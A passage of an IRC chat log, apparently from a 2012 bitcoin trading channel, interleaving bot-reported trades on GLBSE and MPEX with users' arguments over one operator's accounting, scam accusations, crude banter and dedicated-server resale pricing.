dilligance... Sep 09 16:05:44 im not here to save the world from scammers Sep 09 16:05:54 just protecting my btc Sep 09 16:06:18 you dont need to be so upset for me just asking to see assets, its really not an odd question man, calm down Sep 09 16:06:45 well i gota go guys Sep 09 16:06:50 ill be back for mathews fail alter Sep 09 16:06:55 peace all Sep 09 16:07:33 usagi: I hope you're right. Sep 09 16:08:04 [GLBSE] [ZETA-MINING] 5 @ 0.2 = 1 BTC [-] Sep 09 16:08:47 [GLBSE] [NYAN.C] 1 @ 0.65 BTC [+] Sep 09 16:08:57 You're just another man. Sep 09 16:08:58 ZETA-MINING: dividends for week 36.2012 paid Sep 09 16:09:15 "You should" Sep 09 16:09:22 That's so authoritarian. Sep 09 16:09:29 [MPEX] [S.MPOE] 7300 @ 0.00039821 = 2.9069 BTC [+] Sep 09 16:09:31 [MPEX] [S.MPOE] 4020 @ 0.00039968 = 1.6067 BTC [+] Sep 09 16:09:32 [MPEX] [S.MPOE] 14456 @ 0.00040035 = 5.7875 BTC [+] Sep 09 16:09:32 [MPEX] [S.MPOE] 26724 @ 0.00040073 = 10.7091 BTC [+] Sep 09 16:09:33 [GLBSE] [ASICMINER] 40 @ 0.1 = 4 BTC [+] Sep 09 16:10:09 usagi: I don't think there's a need to get defensive if you're confident in your product. Sep 09 16:10:33 but that's just me. Sep 09 16:11:07 I mean, if somebody told me my life was the sound of a toilet flushing. Sep 09 16:11:11 I wouldn't even be mad. Sep 09 16:11:12 [GLBSE] [ASICMINER] 100 @ 0.1 = 10 BTC [+] Sep 09 16:11:25 I would say I must be a pretty goddamn awesome toilet. Sep 09 16:13:01 lol Sep 09 16:13:05 You know Sep 09 16:13:13 This is so overly dramatic Sep 09 16:18:06 [GLBSE] [NYAN.B] 1 @ 0.999 BTC [-] Sep 09 16:19:28 doc doesnt want me eating too much salt :< Sep 09 16:19:32 [GLBSE] [RAREEARTH] 17 @ 0.00955 = 0.1624 BTC [+] Sep 09 16:22:04 [GLBSE] [SILVER] 14 @ 0.01 = 0.14 BTC [+] Sep 09 16:25:04 [MPEX] [F.GIGA.ETF] 1922 @ 0.00068211 = 1.311 BTC [+] Sep 09 16:34:27 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Sep 09 16:37:02 Thank you! Sep 09 16:38:19 OMG GIRL ON THE INTERNET Sep 09 16:38:27 It gets around relatively easily. Sep 09 16:38:36 Testosterone works that way. Sep 09 16:40:13 :D Sep 09 16:40:23 Man, the griefers are in full swing Sep 09 16:40:29 Are you still in the same area? Sep 09 16:40:45 [GLBSE] [BDK.BND] 39 @ 0.1 = 3.9 BTC [-] Sep 09 16:40:52 Are people joining you? :O Sep 09 16:45:23 [MPEX] [S.MPOE] 200 @ 0.00039547 = 0.0791 BTC [-] Sep 09 16:45:25 [MPEX] [S.MPOE] 24178 @ 0.00039525 = 9.5564 BTC [-] Sep 09 16:45:26 [MPEX] [S.MPOE] 11822 @ 0.00039513 = 4.6712 BTC [-] Sep 09 16:45:27 who's the girl on the internet ? Sep 09 16:47:29 : ( Parasites Sep 09 16:47:39 mircea_popescu: Your mom. Sep 09 16:48:13 my mom's not a girl anymore and not on the internet yet. Sep 09 16:48:29 which btw reminds me, what's the difference between an obama supporter and a romney supporter ? Sep 09 16:48:54 mircea_popescu: An Obama supporter is more likely to be on welfare and want to take your guns. Sep 09 16:48:58 but that's about it. Sep 09 16:49:18 a romney supporter signs romney checks on the front. an obama supporter signs obama checks on the back. Sep 09 16:49:30 lololol Sep 09 16:49:45 Anyways, Romney is more likely to sign an assault weapons bill than Obama Sep 09 16:49:47 Fuck them both. Sep 09 16:50:00 just a joke ya know. Sep 09 16:50:11 Sorry I spend too much on /pol/ Sep 09 16:50:16 too much time* Sep 09 16:50:22 It gets super cereal Sep 09 16:52:01 it's not a truck you know. Sep 09 16:53:25 [GLBSE] [GIGAMINING] 1 @ 0.71999999 BTC [-] Sep 09 16:57:03 [MPEX] [S.MPOE] 13878 @ 0.00039513 = 5.4836 BTC [-] Sep 09 16:57:04 [MPEX] [S.MPOE] 48422 @ 0.00039509 = 19.131 BTC [-] Sep 09 16:57:55 [MPEX] [F.GIGA.ETF] 9200 @ 0.00067821 = 6.2395 BTC [-] Sep 09 17:16:44 [GLBSE] [GSDPT] 600 @ 0.0034 = 2.04 BTC [+] Sep 09 17:18:18 http://www.betsofbitco.in/item?id=566 4:1 srsly ? i r dissapoint. Sep 09 17:19:04 [GLBSE] [NASTY] 3 @ 0.5999 = 1.7997 BTC [-] Sep 09 17:20:19 [MPEX] [S.MPOE] 12678 @ 0.00039509 = 5.009 BTC [-] Sep 09 17:20:20 [MPEX] [S.MPOE] 21530 @ 0.00039498 = 8.5039 BTC [-] Sep 09 17:31:00 http://www.google.com/search?q=btc&complete=0 you know the fact bitcoin is nowhere there is kinda sad. Sep 09 17:34:21 [GLBSE] [ASICMINER] 30 @ 0.0999 = 2.997 BTC [-] Sep 09 17:34:27 http://www.google.com/url?sa=t&rct=j&q=btc&source=web&cd=4&cad=rja&ved=0CD0QFjAD&url=https%3A%2F%2Fbtc-e.com%2F&ei=5ahMUJP_L5ORqwHI8IGYBg&usg=AFQjCNGe9XeqZDB-24BlJJH_EdqzIhcBlA Sep 09 17:36:02 [GLBSE] [ASICMINER] 1 @ 0.0999 BTC [-] Sep 09 17:37:46 [GLBSE] [FPGAMINING] 1 @ 0.7501 BTC [+] Sep 09 17:38:14 [GLBSE] [ASICMINER] 7 @ 0.0999 = 0.6993 BTC [-] Sep 09 17:44:26 [GLBSE] [YABMC] 2 @ 0.11 = 0.22 BTC [-] Sep 09 17:46:08 [GLBSE] [TYGRR.BOND-P] 6 @ 0.058 = 0.348 BTC [-] Sep 09 17:47:32 [GLBSE] [FPGAMINING] 3 @ 0.7501 = 2.2503 BTC [+] Sep 09 17:47:55 [GLBSE] [ASICMINER] 2 @ 0.0999 = 0.1998 BTC [-] Sep 09 17:48:44 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC [+] Sep 09 17:49:38 [GLBSE] [FPGA.CONTRACT] 1 @ 0.0718 BTC [+] Sep 09 17:52:10 [GLBSE] [BBBB] 28 @ 0.00024 = 0.0067 BTC [+] Sep 09 17:55:11 [GLBSE] [PPT.A] 1 @ 0.32 BTC [-] Sep 09 17:56:06 [GLBSE] [SILVER] 32 @ 0.01 = 0.32 BTC [+] Sep 09 17:56:08 [GLBSE] [JAH] 2 @ 0.14101 = 0.282 BTC [-] Sep 09 17:56:10 [GLBSE] [JAH] 2 @ 0.1401 = 0.2802 BTC [-] Sep 09 17:56:36 [GLBSE] [MU] 2 @ 0.2699 = 0.5398 BTC [-] Sep 09 17:57:54 [MPEX] [S.MPOE] 200 @ 0.00039613 = 0.0792 BTC [+] Sep 09 17:57:55 [MPEX] [S.MPOE] 300 @ 0.00039663 = 0.119 BTC [+] Sep 09 17:58:40 [GLBSE] [OBSI.HRPT] 1 @ 0.1009 BTC [-] Sep 09 17:58:42 [GLBSE] [OBSI.HRPT] 47 @ 0.1001 = 4.7047 BTC [-] Sep 09 17:59:13 [GLBSE] [MU] 10 @ 0.27 = 2.7 BTC [+] Sep 09 17:59:29 [GLBSE] [MU] 5 @ 0.27 = 1.35 BTC [+] Sep 09 17:59:41 [GLBSE] [MU] 2 @ 0.27 = 0.54 BTC [+] Sep 09 18:00:08 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Sep 09 18:02:18 [GLBSE] [GIGAMINING] 5 @ 0.7002 = 3.501 BTC [-] Sep 09 18:02:47 [GLBSE] [GIGAMINING] 10 @ 0.7001 = 7.001 BTC [-] Sep 09 18:03:14 [GLBSE] [GIGAMINING] 81 @ 0.7 = 56.7 BTC [-] Sep 09 18:14:19 [MPEX] [S.DICE] 2000 @ 0.0034 = 6.8 BTC [+] Sep 09 18:14:54 [MPEX] [S.MPOE] 200 @ 0.00039566 = 0.0791 BTC [-] Sep 09 18:14:55 [MPEX] [S.MPOE] 19370 @ 0.00039498 = 7.6508 BTC [-] Sep 09 18:14:56 [MPEX] [S.MPOE] 10430 @ 0.00039493 = 4.1191 BTC [-] Sep 09 18:15:23 [MPEX] [F.GIGA.ETF] 4600 @ 0.00067821 = 3.1198 BTC [-] Sep 09 18:15:25 [MPEX] [F.GIGA.ETF] 3700 @ 0.00067346 = 2.4918 BTC [-] Sep 09 18:15:26 [MPEX] [F.GIGA.ETF] 5900 @ 0.00066973 = 3.9514 BTC [-] Sep 09 18:16:24 [GLBSE] [BDT] 3 @ 1.05 = 3.15 BTC [+] Sep 09 18:17:32 [GLBSE] [OBSI.HRPT] 84 @ 0.1015 = 8.526 BTC [+] Sep 09 18:17:34 [GLBSE] [OBSI.HRPT] 46 @ 0.10158 = 4.6727 BTC [+] Sep 09 18:18:56 [MPEX] [S.MPOE] 18247 @ 0.00039493 = 7.2063 BTC [-] Sep 09 18:19:51 [GLBSE] [BDK.BND] 20 @ 0.1004 = 2.008 BTC [+] Sep 09 18:19:52 [GLBSE] [BDK.BND] 25 @ 0.1005 = 2.5125 BTC [+] Sep 09 18:19:54 [GLBSE] [BDK.BND] 37 @ 0.1009 = 3.7333 BTC [+] Sep 09 18:20:34 [GLBSE] [OBSI.HRPT] 6 @ 0.10158 = 0.6095 BTC [+] Sep 09 18:21:02 [GLBSE] [ASICMINER] 25 @ 0.1 = 2.5 BTC [+] Sep 09 18:29:29 [GLBSE] [HYDRO.BONDS] 4 @ 1.4599 = 5.8396 BTC [+] Sep 09 18:34:55 usagi: what's the NAV of CPA? Sep 09 18:36:24 ITS DONGS Sep 09 18:36:31 infact, negative dongs Sep 09 18:36:34 gabbynot did you get a straight answer ? Sep 09 18:36:38 CPA nav is so low its negative Sep 09 18:37:15 a lot of shares available in the .03's Sep 09 18:37:51 Hm, I am going to buy some CPA Sep 09 18:39:26 [GLBSE] [CPA] 30 @ 0.031 = 0.93 BTC [+] Sep 09 18:39:32 dmc I think is below nav Sep 09 18:39:34 [MPEX] [S.MPOE] 1823 @ 0.00039493 = 0.72 BTC [-] Sep 09 18:39:36 [MPEX] [S.MPOE] 18200 @ 0.00039491 = 7.1874 BTC [-] Sep 09 18:39:37 [MPEX] [S.MPOE] 27339 @ 0.0003949 = 10.7962 BTC [-] Sep 09 18:39:51 [GLBSE] [CPA] 122 @ 0.031 = 3.782 BTC [+] Sep 09 18:40:27 I'll be sure to read it. : ) Sep 09 18:41:09 Reality can be a funny thing. Sep 09 18:41:41 !ticker btc-mining Sep 09 18:41:43 !ticker btcmc Sep 09 18:41:46 !ticker obsi.abmo Sep 09 18:41:50 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.9969] [Spread: 0.0969] [Last: 0.9979] [24hVol: ] [7dAvg: 0.99773] Sep 09 18:41:53 [GLBSE:BTCMC] [Bid: 0.55] [Ask: 0.5899] [Spread: 0.0399] [Last: 0.5898] [24hVol: ] [7dAvg: 0.5568875] Sep 09 18:41:55 [GLBSE:OBSI.ABMO] [Bid: 0.00010001] [Ask: 0.1] [Spread: 0.09989999] [Last: 0.1] [24hVol: 0.2] [7dAvg: 0.088875] Sep 09 18:42:41 nav is 0.0731 atm Sep 09 18:42:56 nav Sep 09 18:42:57 what is nav Sep 09 18:42:58 [GLBSE] [GIGAMINING] 3 @ 0.7199 = 2.1597 BTC [+] Sep 09 18:43:16 net asset value Sep 09 18:43:55 nav is net asset value per share, actually Sep 09 18:44:17 Well buy buy buy Sep 09 18:44:43 Diablo-D3 nav is not "future asset value". it's present asset value. Sep 09 18:44:52 mircea_popescu: okay? Sep 09 18:44:57 what does that have to do with anything? Sep 09 18:45:33 it's moe of a mutual fund term Sep 09 18:45:39 *more Sep 09 18:45:52 mircea_popescu: if you want future nav per share, its probably somewhere in the 10btc each range Sep 09 18:46:10 gabbynot: true, book value per share, may be a better measure Sep 09 18:46:24 yes, true Sep 09 18:46:24 hey, how do you make the bot tell you how many shares are below a certain price Sep 09 18:46:27 but that has other implications too Sep 09 18:47:39 also, if i read that correctly, cpa doesn't report it's financials in such a way as to calculate a book value per share Sep 09 18:49:01 i'm just curious to see a balance sheet .03ish *might* be a good buy if the numbers look good Sep 09 18:50:54 [GLBSE] [CPA] 32 @ 0.031 = 0.992 BTC [+] Sep 09 18:52:38 [GLBSE] [HYDRO.BONDS] 1 @ 1.46 BTC [+] Sep 09 18:53:41 usagi: did CPA insure Hashking's deposits at all? Sep 09 18:54:11 [MPEX] [S.MPOE] 10861 @ 0.0003949 = 4.289 BTC [-] Sep 09 18:54:12 [MPEX] [S.MPOE] 16849 @ 0.00039486 = 6.653 BTC [-] Sep 09 18:54:33 i hope he pays *something* to people Sep 09 18:55:29 ah, got it Sep 09 18:57:34 i see nav of nyan.b is down a bit Sep 09 18:58:00 what sort of income is that personal share transfer? Sep 09 18:58:10 usagi: so Im thinking this Sep 09 18:58:17 sell about 5 billion shares Sep 09 18:58:17 at Sep 09 18:58:18 misc/altruism ? Sep 09 18:58:22 0.000000001 Sep 09 18:58:54 oh, so a capital investment? Sep 09 18:59:39 i'm not sure i would consider additional investment as covering a decline Sep 09 19:00:12 usagi: He isn't paying Sep 09 19:00:28 No, Matthew. Sep 09 19:00:33 People hedged with him Sep 09 19:01:17 did anyone actually think matthew would pay? Sep 09 19:01:29 nope. Sep 09 19:01:33 usagi: why should i not consider you sending assets to nyan.b without any personal gain, anything b ut cooking the books? Sep 09 19:01:34 bitcoincharts.com is down... funny that we talked about it being down just yesterday Sep 09 19:01:48 I am officially boss by giving usagi a idea without even knowing the idea myself! :D Sep 09 19:01:49 sgnb yeah i was thinking just that. Sep 09 19:02:08 e had a kernel panic within the MD layer of the linux kernel. Service will be restored within the next 7 days. Sep 09 19:02:14 is what i got from the guy. Sep 09 19:02:24 it's what is published on their website Sep 09 19:02:47 o it is ? Sep 09 19:02:52 o yeah it is Sep 09 19:03:02 well, at the time it was only showing nginx/bad gateway Sep 09 19:03:08 usagi: you said yourself the goal was to pump up nyan, and without proper accounting of it (i.e, you just giveing the shares to nyan) that sounds like cooking the books Sep 09 19:03:52 so it's not a capital investment? Sep 09 19:04:09 it's like a donation? Sep 09 19:04:30 yeah, you actually told me it was a capital investment, not 5 min ago :/ Sep 09 19:04:58 i'm just weary of it, sry :/ Sep 09 19:05:08 i don't imagine the guy has a clue. he was an expert on ito integrals earlier, now he can't do basic accounting. Sep 09 19:05:32 it blows with the wind. Sep 09 19:05:50 [GLBSE] [BITBOND] 1 @ 0.4269 BTC [+] Sep 09 19:05:52 [GLBSE] [BITBOND] 1 @ 0.427 BTC [+] Sep 09 19:06:31 [GLBSE] [PUREMINING] 1 @ 0.09577 BTC [+] Sep 09 19:06:33 [GLBSE] [NYAN.B] 1 @ 0.99 BTC [-] Sep 09 19:06:38 [MPEX] [S.MPOE] 26551 @ 0.00039486 = 10.4839 BTC [-] Sep 09 19:06:39 usagi: am i to understand that the operations you are involved in rely on you donating to them to stay afloat? Sep 09 19:06:40 [MPEX] [S.MPOE] 30917 @ 0.00039483 = 12.207 BTC [-] Sep 09 19:07:06 !ticker FDBF Sep 09 19:07:12 i guess i'm missing somthing her, sorry usagi Sep 09 19:07:40 [GLBSE:FDBF] [Bid: 0.01200001] [Ask: 0.15] [Spread: 0.13799999] [Last: 0.15] [24hVol: 2.25] [7dAvg: 0.14998956] Sep 09 19:08:04 then why isn't it a capital investmen? Sep 09 19:08:05 Also his guaranteed deposit? Usagi Sep 09 19:08:46 latest from Hashking: https://bitcointalk.org/index.php?topic=66802.msg1173946#msg1173946 Sep 09 19:09:12 so, then, usagi, it takes your personal funds being donated to these operations for them to work? Sep 09 19:10:36 i'm just not at all used to hearing of a officer's personal funds going into things as donations Sep 09 19:11:08 it looks bad because it looks like unethical practice Sep 09 19:11:18 making financial look better than they are Sep 09 19:11:27 usagi: so whats bmf insured by? Sep 09 19:11:55 oh my. Sep 09 19:12:43 usagi: lets try this Sep 09 19:12:48 [GLBSE] [TYGRR.BOND-P] 5 @ 0.042 = 0.21 BTC [-] Sep 09 19:12:49 [GLBSE] [TYGRR.BOND-P] 1 @ 0.042 BTC [-] Sep 09 19:12:52 I buy cpa, nyan, and bmf Sep 09 19:13:04 all of it Sep 09 19:13:11 and all those people become dmc shareholders. Sep 09 19:14:10 usagi: says who Sep 09 19:14:33 [GLBSE] [TYGRR.BOND-P] 85 @ 0.040001 = 3.4001 BTC [-] Sep 09 19:15:41 meh Sep 09 19:18:40 I am not able to give a timeframe on the repayment as there is alot of factors that can effect it. I know for sure it won't be Sep 09 19:18:40 weeks or months, but more then likely in the ballpark of 3 years. Sep 09 19:18:46 whoa so hashking is down. Sep 09 19:18:50 usagi: so Ive been thinking Sep 09 19:19:02 usagi: Im going to put a motion up to end dividends until NAV reaches 1 Sep 09 19:20:02 Hahaha That Will be in 2014 Sep 09 19:20:03 [MPEX] [S.MPOE] 4083 @ 0.00039483 = 1.6121 BTC [-] Sep 09 19:20:03 [MPEX] [S.MPOE] 17817 @ 0.00039481 = 7.0343 BTC [-] Sep 09 19:20:21 [GLBSE] [BMF] 1 @ 0.579 BTC [+] Sep 09 19:20:23 PsychoticBoy this is sad tho. seems one thing a week, pirate then shtylman dood now this... Sep 09 19:20:35 Lol Sep 09 19:20:35 usagi: best plan ever, right? Sep 09 19:20:40 No Sep 09 19:21:13 Dumber than buying out share golfers Sep 09 19:21:30 [GLBSE] [TYGRR.BOND-P] 49 @ 0.042 = 2.058 BTC [+] Sep 09 19:21:36 Holders Sep 09 19:21:47 [GLBSE] [CPA] 1 @ 0.022 BTC [-] Sep 09 19:21:48 [GLBSE] [CPA] 1 @ 0.021 BTC [-] Sep 09 19:22:20 usagi: nope, I think I can do it Sep 09 19:23:34 [GLBSE] [OBSI.HRPT] 3 @ 0.10158 = 0.3047 BTC [+] Sep 09 19:23:38 without restructuring Sep 09 19:24:20 Lmfao D Sep 09 19:24:46 [GLBSE] [TYGRR.BOND-P] 36 @ 0.040001 = 1.44 BTC [-] Sep 09 19:24:47 [GLBSE] [TYGRR.BOND-P] 27 @ 0.04 = 1.08 BTC [-] Sep 09 19:24:49 [GLBSE] [TYGRR.BOND-P] 60 @ 0.04 = 2.4 BTC [-] Sep 09 19:25:38 [GLBSE] [FOO.PPPPT] 10 @ 0.051 = 0.51 BTC [-] Sep 09 19:26:39 okay, I need 20k btc Sep 09 19:26:43 I have almost 2. Sep 09 19:27:24 if I make 200 btc a month Sep 09 19:27:35 plus about 100 btc a month in dividends Sep 09 19:27:39 is anyone else getting GPUmax email invites? Sep 09 19:27:42 it should take me Sep 09 19:28:02 yes gpumax invites are going out but they have no work Sep 09 19:28:17 [GLBSE] [TYGRR.BOND-P] 158 @ 0.0330001 = 5.214 BTC [-] Sep 09 19:28:19 5 months. Sep 09 19:28:22 how did they get my email? Sep 09 19:28:47 usagi: nope. Sep 09 19:28:54 I am not informing you of a crucial step Sep 09 19:29:05 Position: SCAMMER Sep 09 19:29:05 oh lol Sep 09 19:29:31 Nice Sep 09 19:29:36 I called it Sep 09 19:29:39 I called it first Sep 09 19:29:50 Although it doesn't matter Sep 09 19:29:52 usagi: but I bet I could do this in under a year. Sep 09 19:29:52 Everyone knew Sep 09 19:31:46 Yeah D you said so many things and nothing works Sep 09 19:31:50 blazing1 some people were saying they are Sep 09 19:32:07 PsychoticBoy_: actually its been working great Sep 09 19:32:24 Yeah maybe for you Sep 09 19:32:39 I've pretty much guaranteed the future of the plan. Sep 09 19:32:45 Not for shareholders Sep 09 19:33:08 No future is also a future Sep 09 19:33:19 shareholders will make out like bandits with this Sep 09 19:33:33 You need them jerk Sep 09 19:33:45 You are fucking up ppl Sep 09 19:33:58 psychoticBoy: I think you misunderstood Sep 09 19:34:04 they will make large amounts of money Sep 09 19:34:06 You really deserve a scammer tag Sep 09 19:34:14 For you Sep 09 19:34:20 for them. Sep 09 19:34:27 Hahaha Sep 09 19:34:36 No lies Sep 09 19:34:40 Plz quit Sep 09 19:34:54 PsychoticBoy_: okay, its sorta like this Sep 09 19:34:57 if I quit now Sep 09 19:35:00 _I_ make the money. Sep 09 19:35:16 shareholders get none. Sep 09 19:35:25 Buy out share holdes and all Will be fine Sep 09 19:35:34 Quit this massacre Sep 09 19:35:50 PsychoticBoy_: you can say whatever you want Sep 09 19:36:03 I know and i mean it Sep 09 19:36:03 but unless I buy out shareholders for 1btc per share, Im pretty sure I'd be ripping people off Sep 09 19:36:12 Quit this shit Sep 09 19:36:17 I tl Sep 09 19:36:26 I told you in april Sep 09 19:36:40 PsychoticBoy_: you do realize DMC soon will be selling web services for btc, right? Sep 09 19:36:45 But you wouldnt listen and started dmc Sep 09 19:37:01 So everyone does Sep 09 19:37:19 thats a _very_ large market Sep 09 19:37:24 rg has been trying to get into it but failed Sep 09 19:38:01 You Will too. Sep 09 19:38:09 As so many Sep 09 19:38:26 lmao how has rg failed ?! Sep 09 19:38:26 PsychoticBoy_: hey, you want to help dmc? Sep 09 19:38:32 Shrug al you want. You know i am right Sep 09 19:38:38 make theymos put a scammer tag on my forum account Sep 09 19:38:43 How, thats impossible Sep 09 19:38:53 DMC prices will reach 10btc if you do that Sep 09 19:39:01 Your staff just like me Sep 09 19:39:25 Cant do that, theymos would not either i know him Sep 09 19:39:39 Thats the prob Sep 09 19:40:41 So you are free as a bird :( Sep 09 19:41:23 !pl DMC Sep 09 19:41:24 !pl [@] [] Sep 09 19:41:39 !pl DMC GLBSE Sep 09 19:41:39 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 09 19:41:42 DMC [1@BTC] paid: 0.02635814 BTC. Last price: 0.03510001 BTC. Capital gain: 0.03510001 BTC. Total: 0.06145815 BTC. (-100%) Sep 09 19:41:57 That's a little far-fetched Diablo Sep 09 19:42:00 but miracles happen Sep 09 19:42:35 the best part is Sep 09 19:42:40 I could do this with zero assets. Sep 09 19:43:26 Is CPA involed with DMC? Sep 09 19:44:03 Bane_Capital: not yet Sep 09 19:44:10 CPA cant afford to insure DMC, really Sep 09 19:45:16 [GLBSE] [CPA] 1 @ 0.029 BTC [+] Sep 09 19:45:58 [GLBSE] [CPA] 5 @ 0.031 = 0.155 BTC [+] Sep 09 19:46:08 [GLBSE] [CPA] 1 @ 0.031 BTC [+] Sep 09 19:47:43 usagi: see pm Sep 09 19:48:03 I dont think it'll matter, see pm Sep 09 19:53:32 I Will not matter how on earth can you possibly insure crap Sep 09 19:53:37 It Sep 09 19:54:00 By lending daipers Sep 09 19:54:33 Sry D but that are my thoughts Sep 09 19:59:33 I think usagi passed out Sep 09 20:00:27 Sure i would too Sep 09 20:01:18 Diablo-D3 why ? Sep 09 20:01:36 [MPEX] [S.MPOE] 12695 @ 0.00039481 = 5.0121 BTC [-] Sep 09 20:01:38 [MPEX] [S.MPOE] 15101 @ 0.00039472 = 5.9607 BTC [-] Sep 09 20:01:57 because its pretty late there Sep 09 20:06:38 usagi: see pm Sep 09 20:07:19 [GLBSE] [ASICMINER] 8 @ 0.1 = 0.8 BTC [+] Sep 09 20:08:58 Lol usagi Sep 09 20:09:24 usagi: seriously, see pm. Sep 09 20:09:38 It would certainly do better than dmc Sep 09 20:09:55 !ticker FDBF Sep 09 20:10:01 [GLBSE:FDBF] [Bid: 0.01200001] [Ask: 0.15] [Spread: 0.13799999] [Last: 0.15] [24hVol: 1.8] [7dAvg: 0.14998956] Sep 09 20:10:17 k Sep 09 20:10:29 usagi: take your time, if I do it, its after obsi pays dividends Sep 09 20:10:36 since hes slow as fuck Sep 09 20:13:32 [GLBSE] [PUREMINING] 1 @ 0.09577 BTC [+] Sep 09 20:19:09 [GLBSE] [TYGRR.BOND-P] 1 @ 0.065 BTC [+] Sep 09 20:24:41 [GLBSE] [ASICMINER] 6 @ 0.1 = 0.6 BTC [+] Sep 09 20:25:20 [MPEX] [B.MPCD.C] 12000 @ 0.00103417 = 12.41 BTC [+] Sep 09 20:27:16 [GLBSE] [OBSI.HRPT] 24 @ 0.1002 = 2.4048 BTC [-] Sep 09 20:27:18 [GLBSE] [OBSI.HRPT] 52 @ 0.1001 = 5.2052 BTC [-] Sep 09 20:27:19 [GLBSE] [OBSI.HRPT] 10 @ 0.1001 = 1.001 BTC [-] Sep 09 20:27:20 [GLBSE] [OBSI.HRPT] 18 @ 0.100001 = 1.8 BTC [-] Sep 09 20:27:22 [GLBSE] [OBSI.HRPT] 400 @ 0.1 = 40 BTC [-] Sep 09 20:27:23 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Sep 09 20:27:24 [GLBSE] [OBSI.HRPT] 3500 @ 0.1 = 350 BTC [-] Sep 09 20:27:24 [GLBSE] [OBSI.HRPT] 600 @ 0.1 = 60 BTC [-] Sep 09 20:27:25 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [-] Sep 09 20:27:27 [GLBSE] [OBSI.HRPT] 120 @ 0.1 = 12 BTC [-] Sep 09 20:28:59 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 09 20:29:01 [GLBSE] [ASICMINER] 27 @ 0.1 = 2.7 BTC [+] Sep 09 20:30:25 [GLBSE] [MMM] 3 @ 0.85 = 2.55 BTC [-] Sep 09 20:30:34 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Sep 09 20:30:52 [GLBSE] [OBSI.HRPT] 1750 @ 0.1 = 175 BTC [-] Sep 09 20:32:44 In a few hours FDBF Will pay dividend Sep 09 20:33:06 [GLBSE] [OBSI.HRPT] 140 @ 0.1 = 14 BTC [-] Sep 09 20:33:27 [12:38] lmao how has rg failed ?! Sep 09 20:33:29 not quite Sep 09 20:33:30 Aprox 1.5% of Sep 09 20:33:32 we gave up on dedicated sales Sep 09 20:33:39 it was costing us more per month to setup the servers and get them running Sep 09 20:33:42 cause no one ever cancels Sep 09 20:33:45 the accounts just go overdue Sep 09 20:33:54 and your host, diablo, charges $5/day on late fees Sep 09 20:34:10 so we'd make $50 on the server, then give back $25 in late fees cause customersn ever cancel Sep 09 20:34:12 [GLBSE] [OBSI.HRPT] 540 @ 0.1 = 54 BTC [-] Sep 09 20:34:22 that's why i wish you the best selling dedis for btc Sep 09 20:34:28 cause its a losing game Sep 09 20:34:52 well Diablo-D3 has big plans, usually. Sep 09 20:35:03 step 1. host where bitvps hosts Sep 09 20:35:09 step 2. ?? Sep 09 20:35:11 step 3. profit Sep 09 20:35:14 rg: I dont have to worry about $5/day late Sep 09 20:35:23 you will Sep 09 20:35:24 just wait Sep 09 20:35:26 cronjob. Sep 09 20:35:29 whatever nenolod/bdwarr tells you Sep 09 20:35:33 just wait til steve hears it Sep 09 20:35:35 and revereses it Sep 09 20:35:40 nenolod/bdawrr are employees Sep 09 20:35:41 steve is the boss Sep 09 20:35:44 and what steve says, goes Sep 09 20:35:50 regardless of wat bdwarr/nenolod say Sep 09 20:35:59 cant beat a cronjob Sep 09 20:36:15 i dont see how your cron job is going to do anything Sep 09 20:36:18 for late fees Sep 09 20:36:27 [GLBSE] [PAJKA.BOND] 1 @ 0.075 BTC [+] Sep 09 20:36:34 1 second past failure to pay, dedi is ended. Sep 09 20:36:41 yes but 1 second past failure Sep 09 20:36:42 is late Sep 09 20:36:52 you order the box, the customer pays Sep 09 20:36:54 the dates arent synced Sep 09 20:36:58 cause you ordered it a day before they paid Sep 09 20:37:04 so your billing date is 1 day before theirs Sep 09 20:37:06 [MPEX] [S.MPOE] 200 @ 0.00039608 = 0.0792 BTC [+] Sep 09 20:37:14 so when theyre late 1 day Sep 09 20:37:16 you're late 2 Sep 09 20:37:19 you feel me? Sep 09 20:37:20 rg: not quite Sep 09 20:37:28 since at that point Ive already made them 3 days late. Sep 09 20:37:43 yea yea Sep 09 20:37:45 less chat more splat Sep 09 20:37:57 "less swag more frag" Sep 09 20:38:30 rg: how much were you paying for dedis? Sep 09 20:38:47 I mean, how much % off due to bulk reselling Sep 09 20:38:49 i got the e3 1230 (not v2) with 16gb ram and 2tb Sep 09 20:38:53 for $95 Sep 09 20:39:04 and the v2 is an extra 10 bucsk Sep 09 20:39:22 and for the dual quad e5, i pay $400 incl 128 ips/raid card/4x1tb Sep 09 20:39:26 er Sep 09 20:39:29 not dual quad Sep 09 20:39:35 what's a six core called? Sep 09 20:39:40 six core Sep 09 20:39:42 sexcore Sep 09 20:39:46 no, hex Sep 09 20:39:49 FDBF is flyingdutchmanbitcoinfund Sep 09 20:39:58 and then theres those i7's Sep 09 20:40:02 wait, fdbf is real?! Sep 09 20:40:02 i could probbaly get for free Sep 09 20:40:03 lol Sep 09 20:40:10 but selling servers is a hassle Sep 09 20:40:12 vps is easier Sep 09 20:40:34 [GLBSE] [MMM] 2 @ 0.9 = 1.8 BTC [+] Sep 09 20:40:35 [MPEX] [F.GIGA.ETF] 8400 @ 0.00066678 = 5.601 BTC [-] Sep 09 20:40:50 rg: wait, why the fuck are you getting those cheaper than me Sep 09 20:41:30 Yes we are real (FDBF) Sep 09 20:41:48 PsychoticBoy_: but its pirate themed! Sep 09 20:41:48 Diablo-D3> rg: wait, why the fuck are you getting those cheaper than me <<< epic. Sep 09 20:42:11 No its got nothing to do with pirate Sep 09 20:42:26 rg: I'd end up paying $135/mo for the e3-1230v2 16gb 2tb Sep 09 20:42:38 Its called that because we ( paladon and i) are dutch Sep 09 20:45:03 [GLBSE] [JLP-BMD] 2 @ 0.081 = 0.162 BTC [-] Sep 09 20:45:29 [GLBSE] [MERGEDMINING] 10 @ 0.062 = 0.62 BTC [-] Sep 09 20:46:12 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC [+] Sep 09 20:46:14 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Sep 09 20:46:15 [GLBSE] [ASICMINER] 293 @ 0.103 = 30.179 BTC [+] Sep 09 20:46:16 [GLBSE] 